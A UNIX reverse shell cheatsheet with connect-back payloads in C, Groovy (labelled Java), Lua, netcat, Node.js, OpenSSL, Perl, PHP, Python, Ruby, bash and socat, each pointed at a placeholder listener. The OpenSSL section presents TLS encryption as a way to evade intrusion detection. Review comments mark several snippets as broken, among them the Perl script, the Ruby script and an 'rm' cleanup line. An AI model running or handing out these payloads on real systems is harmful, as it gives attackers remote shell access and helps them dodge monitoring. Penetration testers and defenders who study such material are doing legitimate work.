UNIX Reverse Shells Cheatsheet

Table of contents


Reverse shells

C

#include <stdio.h>
#include <unistd.h>
#include <arpa/inet.h>

#define REV_IP    "127.0.0.1"
#define REV_PORT  4444

/*
 * Connect-back shell: opens a TCP connection to REV_IP:REV_PORT, maps the
 * socket onto stdin/stdout/stderr with dup2(), then replaces the process
 * image with /bin/sh so the shell's I/O flows over the socket.
 *
 * Review notes:
 *  - the return values of socket() and connect() are never checked, so a
 *    failed connection still falls through to dup2()/execve() on a bad fd;
 *  - execve() is given argv == NULL, which POSIX leaves unspecified (Linux
 *    tolerates it), and envp == NULL, so the shell starts with no environment;
 *  - from a monitoring standpoint the distinctive step is a shell being
 *    exec'd with fds 0-2 already pointing at a network socket.
 */
int main(int argc, char *argv[]) {
    struct sockaddr_in sa;
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr(REV_IP);   /* IPv4 only: inet_addr() does not parse IPv6 */
    sa.sin_port = htons(REV_PORT);             /* port to network byte order */
    int s = socket(AF_INET, SOCK_STREAM, 0);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));
    dup2(s, 0);                                /* stdin  <- socket */
    dup2(s, 1);                                /* stdout -> socket */
    dup2(s, 2);                                /* stderr -> socket */
    execve("/bin/sh", 0, 0);                   /* only returns on failure */
    return 0;
}

One-liner in a shell to create and compile the C reverse shell:

# Writes the C program above to rev.c and compiles it. The outer shell expands
# $IP and $PORT into the inet_addr()/htons() arguments before printf sees the
# string; printf then turns the \n and \t escapes into newlines and tabs. The
# source contains no '%' so no printf format directives are triggered.
IP="127.0.0.1"; PORT=4444; printf "#include <stdio.h>\n#include <unistd.h>\n#include <arpa/inet.h>\n\nint main(int argc, char *argv[]){\n\tstruct sockaddr_in sa;\n\tsa.sin_family=AF_INET;\n\tsa.sin_addr.s_addr=inet_addr(\"$IP\");\n\tsa.sin_port=htons($PORT);\n\tint s = socket(AF_INET,SOCK_STREAM,0);\n\tconnect(s,(struct sockaddr *)&sa,sizeof(sa));\n\tdup2(s,0);\n\tdup2(s,1);\n\tdup2(s,2);\n\texecve(\"/bin/sh\",0,0);\n\treturn 0;\n}\n" > rev.c && gcc -Wall rev.c -o rev

Java

// NOTE(review): this is Groovy syntax (untyped assignments, `as String[]`,
// no semicolons), not plain Java; it will not compile as a .java source file.
// Spawns bash with a command that opens /dev/tcp/1.2.3.4/4444 on fd 5 and
// loops reading lines from it, running each line with stdout/stderr sent
// back over fd 5. The `\$line` stops Groovy from interpolating the GString
// so the literal `$line` reaches bash.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/1.2.3.4/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()  // blocks the calling thread until the spawned bash exits

Lua

In a Lua script:

-- Needs the LuaSocket library (`require('socket')`); `os` is a standard
-- library so `require('os')` is redundant but harmless. Opens a TCP socket to
-- 1.2.3.4:4444, then runs an interactive /bin/sh whose fds 0/1/2 are
-- redirected to fd 3. The return value of t:connect() is not checked.
-- NOTE(review): this assumes the connected socket is file descriptor 3 of
-- the process (the first fd after stdin/stdout/stderr) - not guaranteed; confirm.
require('socket');
require('os');
t = socket.tcp();
t:connect('1.2.3.4','4444');
os.execute('/bin/sh -i <&3 >&3 2>&3');

One-liner from a shell:

# Same Lua script as above, passed inline with `lua -e`; it also relies on the
# socket landing on fd 3 and needs LuaSocket installed on the host.
lua -e "require('socket');require('os');t=socket.tcp();t:connect('1.2.3.4','4444');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Netcat

netcat-traditional

# netcat-traditional only: -e hands the connection's stdin/stdout to /bin/sh.
# The -e option is absent from the OpenBSD netcat rewrite, hence the fifo
# variant in the next section.
nc -e /bin/sh 1.2.3.4 4444

New netcat

# Fifo loop for netcat without -e: nc reads its stdin from the fifo, what nc
# receives is piped into an interactive sh, and sh's output (stderr merged)
# is tee'd back into the fifo for nc to send. tee also echoes to the local
# stdout. The fifo /tmp/p is not removed afterwards.
mkfifo /tmp/p;nc 1.2.3.4 4444 0</tmp/p|/bin/sh -i 2>&1|tee /tmp/p

Node.js

// child_process.exec() runs the command string through the system shell; the
// command itself is the bash /dev/tcp one-liner from the Shell section, so
// bash must be installed on the host. No callback is given, so the result
// and any error are discarded.
require('child_process').exec('bash -i >& /dev/tcp/1.2.3.4/4444 0>&1');

OpenSSL

Encrypted reverse shell

An encrypted reverse shell can help avoid automatic detection by network security monitoring tools such as Intrusion Detection Systems (IDS), because the shell traffic is carried inside a TLS session instead of in cleartext; the outbound connection itself remains visible. To create one, generate an SSL certificate and start an SSL listener on your attacking machine, then run the reverse shell payload on the target machine.

  1. Generate a self-signed SSL certificate:
# Self-signed X.509 certificate (-x509) with a fresh RSA-4096 key, valid for
# 365 days; -nodes leaves the private key unencrypted so s_server can load it
# without a passphrase prompt, and -quiet suppresses the interactive output.
openssl req -x509 -quiet -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  2. Start an SSL listener on your attacking machine using openssl:
# TLS listener on port 4444 using the key and certificate generated above;
# -quiet hides the handshake/session details so only the shell I/O is shown.
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
  3. Run the payload on the target machine using openssl:

Short payload:

# Fifo loop over TLS: sh reads its input from the fifo, its output (stderr
# merged) is piped into s_client, and whatever s_client receives is written
# back into the fifo for sh. s_client's own diagnostics go to /dev/null.
# The fifo is removed once the pipeline exits.
mkfifo /tmp/s;/bin/sh -i</tmp/s 2>&1|openssl s_client -quiet -connect 1.2.3.4:4444>/tmp/s 2>/dev/null;rm /tmp/s

Detailed payload:

# Same construction as the short payload, spread over several lines.
# NOTE(review): the cleanup line `rm/tmp/pipesocket` is missing the space
# between the command and its argument (compare `rm /tmp/s` above), so the
# shell reports "rm/tmp/pipesocket: not found" and the fifo is left behind.
mkfifo /tmp/pipesocket
/bin/sh -i < /tmp/pipesocket 2>&1 \
    | openssl s_client -quiet -connect 1.2.3.4:4444 > /tmp/pipesocket 2>/dev/null
rm/tmp/pipesocket

Perl

# NOTE(review): `use Socket` is missing its trailing semicolon; as written
# the script does not compile (the one-liner below has it right).
use Socket
$ip = "1.2.3.4";   # listener address
$port = 4444;      # listener port
# IPv4 TCP socket on filehandle S; its return value is not checked.
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
# Only if connect() succeeds: duplicate STDIN/STDOUT/STDERR onto the socket
# (">&S" dups a filehandle rather than opening a path) and replace the perl
# process with an interactive /bin/sh that inherits those descriptors.
if(connect(S, sockaddr_in($port, inet_aton($ip)))){
    open(STDIN,">&S");
    open(STDOUT,">&S");
    open(STDERR,">&S");
    exec("/bin/sh -i");
};

One-liner from a shell:

# Inline form of the Perl script above (with the `use Socket;` semicolon
# present). Single quotes keep the $-variables away from the outer shell.
perl -e 'use Socket;$i="1.2.3.4";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP

In a PHP file:

// Fragment: belongs inside <?php ... ?> tags. fsockopen() returns a stream
// resource for the TCP connection to 1.2.3.4:4444 (or false on failure,
// which is not checked); exec() then runs an interactive /bin/sh with its
// fds 0/1/2 redirected to fd 3.
// NOTE(review): relies on the socket being fd 3 of the PHP process - confirm.
$sock = fsockopen("1.2.3.4",4444);
exec("/bin/sh -i <&3 >&3 2>&3");

One-liner from a shell:

# Inline form of the PHP fragment above via `php -r`; same fd-3 assumption.
php -r '$sock=fsockopen("1.2.3.4",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python

Using the subprocess module

# Connect-back shell using only the standard library: open a TCP socket to
# 1.2.3.4:4444, duplicate its descriptor onto fds 0/1/2, then run an
# interactive /bin/sh that inherits them. Valid under both Python 2 and 3.
import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4",4444))  # raises OSError (socket.error) if the listener is unreachable

os.dup2(s.fileno(),0)  # stdin  <- socket
os.dup2(s.fileno(),1)  # stdout -> socket
os.dup2(s.fileno(),2)  # stderr -> socket

# NOTE(review): subprocess.call() blocks until the shell exits and returns its
# exit status (an int), not a Popen object, so `p` is a return code.
p = subprocess.call(["/bin/sh","-i"])

One-liner from a shell:

# Inline form of the subprocess variant, invoked with python2 (the code itself
# runs unchanged under python3).
python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Using the pty module

# Variant of the subprocess version that uses pty.spawn(): the shell runs
# behind a pseudo-terminal and pty.spawn() copies data between that terminal
# and the process's stdin/stdout, which at this point are the socket.
# The trailing semicolons are redundant in Python (a leftover of the one-liner).
import pty, socket, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 4444));  # raises OSError if the listener is unreachable

os.dup2(s.fileno(), 0);  # stdin  <- socket
os.dup2(s.fileno(), 1);  # stdout -> socket
os.dup2(s.fileno(), 2);  # stderr -> socket

pty.spawn("/bin/sh")  # returns only when the shell exits

One-liner from a shell:

# Inline form of the pty variant; `python` resolves to whichever interpreter
# is first on PATH.
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Ruby

# TCPSocket needs `require 'socket'` in a script (the one-liner below gets it
# from `-rsocket`). IO#to_i is an alias for #fileno, so f is the socket's
# descriptor number; sprintf builds the redirections for that fd and exec
# replaces the ruby process with the interactive shell.
# NOTE(review): the trailing `'` on the exec line is a stray quote carried
# over from the one-liner and is a syntax error in a script.
f = TCPSocket.open("1.2.3.4",4444).to_i;
exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

One-liner from a shell:

# Inline form of the Ruby script above; -rsocket loads the socket library
# before -e runs.
ruby -rsocket -e 'f=TCPSocket.open("1.2.3.4",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Shell

Shell with /dev/tcp

# bash only: /dev/tcp/HOST/PORT is a bash builtin pseudo-path, not a real
# file, so this fails under a POSIX sh. `>&` sends both stdout and stderr of
# the interactive shell to the connection and `0>&1` points stdin at it too.
bash -i >& /dev/tcp/1.2.3.4/4444 0>&1

Shell with pipes and netcat

# Portable fifo loop: any leftover /tmp/f is removed first, cat feeds the fifo
# into an interactive sh, the shell's output (stderr merged) goes to nc, and
# what nc receives is written back into the fifo. Works with netcat builds
# that lack -e. The fifo is not cleaned up when the pipeline ends.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1.2.3.4 4444 >/tmp/f

Socat

# socat connects to 1.2.3.4:4444 and runs `bash -i` on the other address:
# pty allocates a pseudo-terminal for it, stderr merges the shell's stderr
# into the stream, setsid starts it in a new session, sigint forwards
# interrupts, and sane resets the terminal settings. The trailing & puts
# socat in the background of the invoking shell.
socat tcp:1.2.3.4:4444 exec:'bash -i',pty,stderr,setsid,sigint,sane &